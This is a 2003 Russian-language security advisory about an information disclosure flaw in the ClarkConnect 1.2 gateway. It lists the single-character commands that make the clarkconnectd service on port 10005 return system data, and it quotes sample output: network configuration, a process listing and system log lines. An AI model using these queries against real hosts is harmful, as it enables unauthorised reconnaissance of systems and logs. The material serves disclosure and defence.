Раскрытие информации в ClarkConnect broadband gateway

Дата публикации:
03.03.2003
Всего просмотров:
1783
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в ClarkConnect broadband gateway. Программное обеспечение шлюза может раскрыть информацию о системе удаленному пользователю.

Удаленный пользователь может подключится к 'clarkconnectd' службе (/usr/sbin/clarkconnectd) на 10005 TCP порту, чтобы получить информацию о системе. Удаленный пользователь может представить один из следующих символов, сопровождаемых несколькими знаками смещения на одну строку, чтобы получить различную информацию:

"A" - date and time on server
"F" - some unknown number
"M" - various ifconfig output
"P" - process listing
"Y" - snort log file
"b" - /var/log/messages
Несколько примеров:
[1]=20
eth0 00:50:56:40:89:1F 10.0.0.124 255.255.255.0 none 00:00:00:00:00:00 =
0.0.0.0 0.0.0.0 10.0.0.1-eth0 212.242.40.3 0.0.0.0 -- -- -- --:--:-- -- =
-- -- --:--:--

[2]=20
root 1 0.0 0.0 1308 76 ? S Jan28 0:34 init
root 2 0.0 0.0 0 0 ? SW Jan28 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SW Jan28 0:00 [kapmd]
root 4 0.0 0.0 0 0 ? SWN Jan28 0:00 [ksoftirqd_CPU0]
root 5 0.0 0.0 0 0 ? SW Jan28 0:44 [kswapd]
root 6 0.0 0.0 0 0 ? SW Jan28 0:00 [bdflush]
root 7 0.0 0.0 0 0 ? SW Jan28 0:02 [kupdated]
root 8 0.0 0.0 0 0 ? SW Jan28 0:00 [mdrecoveryd]
root 16 0.0 0.0 0 0 ? SW Jan28 0:34 [kjournald]
root 135 0.0 0.0 0 0 ? SW Jan28 0:00 [kjournald]
root 481 0.0 0.0 1364 164 ? S Jan28 0:33 syslogd -m 0
root 486 0.0 0.0 1912 168 ? S Jan28 0:21 klogd -c 1 -2
root 560 0.0 0.1 2568 312 ? S Jan28 0:04 /usr/sbin/sshd
root 609 0.0 0.0 1472 120 ? S Jan28 0:20 crond
root 639 0.0 0.0 4816 4 ? S Jan28 0:00 smbd -D
root 644 0.0 0.2 3784 384 ? S Jan28 0:42 nmbd -D
root 706 1.7 10.8 51748 20760 ? S Jan28 21:22 snort -D
root 766 0.0 0.0 5248 60 ? S Jan28 0:25 webconfig -f =
/var/webconfig/conf/httpd.conf
root 771 0.0 0.0 1280 4 tty2 S Jan28 0:00 /sbin/mingetty tty2
root 772 0.0 0.0 1280 4 tty3 S Jan28 0:00 /sbin/mingetty tty3
root 773 0.0 0.0 1280 4 tty4 S Jan28 0:00 /sbin/mingetty tty4
root 774 0.0 0.0 1280 4 tty5 S Jan28 0:00 /sbin/mingetty tty5
root 775 0.0 0.0 1280 4 tty6 S Jan28 0:00 /sbin/mingetty tty6
root 2972 0.0 0.0 2224 4 ? S Jan28 0:00 login -- root=20
root 12050 0.0 0.3 2392 700 tty1 S Jan28 0:02 -bash
502 5338 0.0 0.1 5392 380 ? S Jan28 0:16 webconfig -f =
/var/webconfig/conf/httpd.conf
502 5403 0.0 0.1 5288 244 ? S Jan28 0:01 webconfig -f =
/var/webconfig/conf/httpd.conf
suva 5567 0.0 0.4 2416 932 ? S Jan28 0:00 /usr/local/suva/bin/suvad
root 7667 0.0 2.0 5388 3984 ? S Jan28 0:12 netwatchd
root 9897 0.0 0.2 1468 420 ? S 00:07 0:07 clarkconnectd
root 31066 0.5 0.8 3516 1712 ? S 13:06 0:01 /usr/sbin/sshd
kain 31067 0.1 0.6 2380 1280 pts/0 S 13:06 0:00 -bash
root 31127 0.0 0.5 2264 1008 pts/0 S 13:06 0:00 su -
root 31128 0.2 0.6 2396 1304 pts/0 S 13:06 0:00 -bash
root 31250 0.1 0.2 1484 448 ? S 13:09 0:00 clarkconnectd
root 31251 1.0 0.4 2056 844 pts/0 S 13:09 0:00 telnet localhost 10005
root 31252 0.0 0.2 1484 428 ? S 13:09 0:00 clarkconnectd
root 31257 0.0 0.5 2168 968 ? S 13:09 0:00 sh -c /bin/ps auxw | sed "s/[ =
][ ]*/ /g"
root 31258 0.0 0.3 2532 680 ? R 13:09 0:00 /bin/ps auxw
root 31259 0.0 0.1 1336 372 ? S 13:09 0:00 sed s/[ ][ ]*/ /g

[3]



Jan-28-2000 01:35:40 last message repeated 2 times
Jan-28-2000 01:37:40 last message repeated 2 times
Jan-28-2000 01:38:40 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-28-2000 01:40:04 sshd Accepted password for kain from 217.157.2.38 =
port 4624 ssh2
Jan-28-2000 01:40:14 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-28-2000 01:41:14 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-28-2000 01:43:14 last message repeated 2 times
Jan-28-2000 01:45:14 last message repeated 2 times
Jan-28-2000 01:47:14 last message repeated 2 times
Jan-28-2000 01:49:14 last message repeated 2 times
Jan-28-2000 01:50:41 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-28-2000 01:52:41 last message repeated 2 times
Jan-28-2000 01:54:41 last message repeated 2 times
Jan-28-2000 01:56:41 last message repeated 2 times
Jan-28-2000 01:57:42 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-28-2000 01:59:42 last message repeated 2 times
Jan-28-2000 02:01:08 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 11:16:36 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 11:18:36 last message repeated 2 times
Jan-29-2000 11:20:36 last message repeated 2 times
Jan-29-2000 11:22:37 last message repeated 2 times
Jan-29-2000 11:24:37 last message repeated 2 times
Jan-29-2000 11:26:10 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 12:01:09 last message repeated 2 times
Jan-29-2000 12:02:09 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 12:04:10 last message repeated 2 times
Jan-29-2000 12:06:10 last message repeated 2 times
Jan-29-2000 12:07:23 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 12:09:23 last message repeated 2 times
Jan-29-2000 12:11:23 last message repeated 2 times
Jan-29-2000 12:13:23 last message repeated 2 times
Jan-29-2000 12:14:24 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 12:16:24 last message repeated 2 times
Jan-29-2000 12:17:37 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 12:19:37 last message repeated 2 times
Jan-29-2000 12:59:10 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 12:59:25 sshd fatal: Timeout before authentication for =
217.157.2.38.
Jan-29-2000 13:00:10 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 13:01:10 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 13:03:10 last message repeated 2 times
Jan-29-2000 13:05:10 last message repeated 2 times
Jan-29-2000 13:06:10 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 13:06:24 sshd Accepted password for kain from 217.157.2.38 =
port 1526 ssh2
Jan-29-2000 13:07:10 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 13:08:15 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 13:10:15 last message repeated 2 times
Jan-29-2000 13:12:15 last message repeated 2 times
Jan-29-2000 13:13:16 snort [1:469:1] ICMP PING NMAP [Classification: =
Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 13:15:16 last message repeated 2 times
STOP

------=_NextPart_000_003B_01C2DC6C.9392DF10--

Уязвимость обнаружена в ClarkConnect 1.2

Ссылки: clarkconnect(d) information disclosure
или введите имя

CAPTCHA